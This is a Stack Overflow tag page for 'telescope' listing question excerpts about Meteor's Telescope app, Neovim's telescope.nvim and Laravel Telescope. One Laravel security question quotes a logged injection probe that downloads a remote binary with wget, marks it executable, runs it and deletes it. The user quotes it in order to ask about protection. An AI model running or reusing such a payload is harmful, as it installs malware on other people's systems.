Questions tagged [telescope]

Telescope is an open-source social news app (think Hacker News or Reddit clone) built with Meteor, a real-time JavaScript framework.

Telescope is an open-source social news app (think Hacker News or Reddit clone) built with Meteor, a real-time JavaScript framework.

The Telescope application has useful features for managing or building a community built in. Without writing code the following features can be utilized:

  • Multiple layout options
  • Media previews through Embedly API
  • Posts can be filtered and arranged in multiple views
  • Mailchimp newsletter support
  • Over 15 languages supported with more being developed
  • Responsive theme provides smooth mobile user experience

Project Links

119 questions
2
votes
0 answers

SSO or Existing (MySQL) user accounts with meteor/telescope

I've poked around docs a bit but haven't figured much out. How would I integrate existing logins (I have these columns: username, password_bc, public_name, email -- it is not a framework/openid/etc, just a CRUDish home login system). My original…
BMC
  • 166
  • 4
2
votes
2 answers

Meteor - How does Telescope load more posts without re-rendering?

I'm trying to figure out how to implement the load more functionality like Telescope. This is what I have originally: // Iron Router Router.route('/posts', { name: 'posts.index', waitOn: function () { return Meteor.subscribe('posts',…
BPm
  • 2,924
  • 11
  • 33
  • 51
1
vote
1 answer

Neovim: problems with Telescope's history path

when i open telescope every action returns the following: E5108: Error executing lua: ...sers/josqu/.vim/bundle/plenary.nvim/lua/plenary/path.lua:635: Could not create…
1
vote
1 answer

when i use nvim, keymapping does not working in tmux

i have been used Ctrl-` and Ctrl-= keymapping for telescope.nvim and work fine. but when i use Ctrl-` and Ctrl-= keymapping in tmux, it does not working and get error E20: mark not set vim E21: cannot make changes what is wrong with me? other…
김상현
  • 23
  • 3
1
vote
0 answers

Changing colorschemes

I am using telescope to change my colorscheme according to my mood. But I found out that when I change the colorscheme, it does not change the default theme in my init.lua. How can I achieve that?
1
vote
1 answer

How to limit the telescope entries in laravel?

We are using telescope to monitor our laravel application. but telescope is using big amount of database. Yes we can delete records . But is there any way that we only allow telescope to insert record related to queues and schedule commands not all…
user13134426
1
vote
0 answers

Laravel: Events and Mail not being logged to Telescope from feature test

I would like to see Mail that gets sent and is triggered by an Event inside Telescope. I know my event is firing and the mail is sent because I have two tests making use of Event::fake() and Mail::fake(). But on one of my tests, I'm not using the…
good_afternoon
  • 1,529
  • 1
  • 12
  • 41
1
vote
1 answer

Laravel Telescope 403 production

Won't work for me in production no matter what: protected function gate() { Gate::define('viewTelescope', function ($user) { return true; }); } In production always gives me 403, thought the database entries are…
Lucas Dalmarco
  • 256
  • 2
  • 13
1
vote
0 answers

How can create a telescope with migrate

I have successfully installed Telescope: C:\Users\USER\p3>php artisan telescope:install Publishing Telescope Service Provider... Publishing Telescope Assets... Publishing Telescope Configuration... Telescope scaffolding installed…
1
vote
1 answer

Do I have to worry about laravel security?

I have a construction site based on laravel, that was started 2 weeks ago. Today I found the following in the log: remote_host: ";cd /tmp;wget http://104.168.199.188/bins/arm7;chmod 777 arm7;./arm7;rm -rf arm7;%2" This is one of the 10 ip's. I…
IchBin
  • 25
  • 4
1
vote
2 answers

How to use telescope with moloquent / mongodb?

Showing Error {message: "Call to a member function prepare() on null",…} exception: "Symfony\Component\Debug\Exception\FatalThrowableError" file: "/var/www/html/broc/vendor/laravel/framework/src/Illuminate/Database/Connection.php" line: 326…
1
vote
0 answers

Using Firebase Storage and Database together

I'm building a new site using Firebase. The backend will store user profiles, files (PDFs and anything else) that will each have a title and a number of tags. I'm planning on using Telescope (NOVA) to create a reddit style page listing to let users…
1
vote
0 answers

Telescope Nova Insert dynamic add (date, string) array into mongoDb while new post

As shown in image above i want dynamic (name,amount) field in telescope nova while user posting NEW POST. Below is my custome-package custom_field.js var NameAmount = new Mongo.Collection("NameAmount"); NameAmount .schema = new SimpleSchema({ …
Shanky
  • 11
  • 4
1
vote
1 answer

Verifying Deployment: FAILED on deploying Telescope App

I'm trying to deploy the TelescopeApp to DigitalOcean, using mup. All seems to be going well until the 'Verifying Deployment: FAILED'. I am using the abernix/meteord:base dockerimage. The error reads "Failed at the v8-profiler@5.6.5 install script…
ErikSc
  • 11
  • 2
1
vote
0 answers

App Crashing when running Meteor + Telescope app on Mac "Picker is not defined"

I'm very new to Telescope and Meteor. I'm trying to launch both from my mac terminal and this is the issue I'm getting in my browser. I haven't changed any files. Any idea what could it mean? and how to solve it? Thank you, Pierre …
Pierre ARNOU
  • 91
  • 1
  • 6